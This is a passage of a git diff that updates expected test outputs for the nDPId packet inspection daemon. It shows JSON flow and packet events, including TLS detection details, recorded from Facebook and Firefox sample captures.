+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":26519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1472393124229} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 diff --git a/test/results/firefox.pcap.out b/test/results/firefox.pcap.out index 6189a8960..999ccef90 100644 --- a/test/results/firefox.pcap.out +++ b/test/results/firefox.pcap.out @@ -1,47 +1,47 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620927997754} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927997754,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927997754,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} -00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} -00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999111,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmQAbsCvXBwAAAAALAC\/\/+cWAAAAgQFtAEDAwUBAQgKNAyZggAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999112,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999112,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620927999112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999112,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmRAbvLRPiuAAAAALAC\/\/9LkAAAAgQFtAEDAwUBAQgKNAyZgwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yY9yeaT2oLD166AS\/ogrVAAAAgQFrAQCCAo8IAx5NAyZgQEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999138,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZBJLtVRAr1wcaAS\/ohHrwAAAgQFrAQCCAo8IAx6NAyZggEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmPAbugsPXrcnmk94AQECxIWgAAAQEICjQMmZw8IAx5"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 